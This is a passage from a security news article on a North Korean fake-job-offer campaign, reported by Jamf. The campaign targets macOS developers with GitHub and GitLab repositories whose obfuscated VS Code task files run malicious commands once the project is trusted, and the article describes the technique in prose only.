North Korean Hackers Target macOS Developers via Malicious VS Code Projects

North Korean threat actors are abusing Visual Studio Code task configuration files for malware delivery in a new campaign targeting macOS software developers, Jamf warns.

The attacks, the security firm says, represent a fresh iteration of fake job offer campaigns attributed to North Korean hackers, including Operation Dream Job, Contagious Interview, ClickFake Interview, and DeceptiveDevelopment.

Instead of using a ClickFix-based technique for malware delivery, the new attacks trick victims into accessing or cloning repositories hosted on GitHub or GitLab, under the pretext of a job assignment.

The malicious projects, Jamf explains, contain VS Code task configuration files with heavily obfuscated malicious JavaScript code.

Once the repositories are opened in VS Code, the victim is prompted to trust the project’s author, which results in malicious commands being executed on the macOS system.

The executed shell command retrieves a JavaScript payload and pipes it into the Node.js runtime, which ensures ...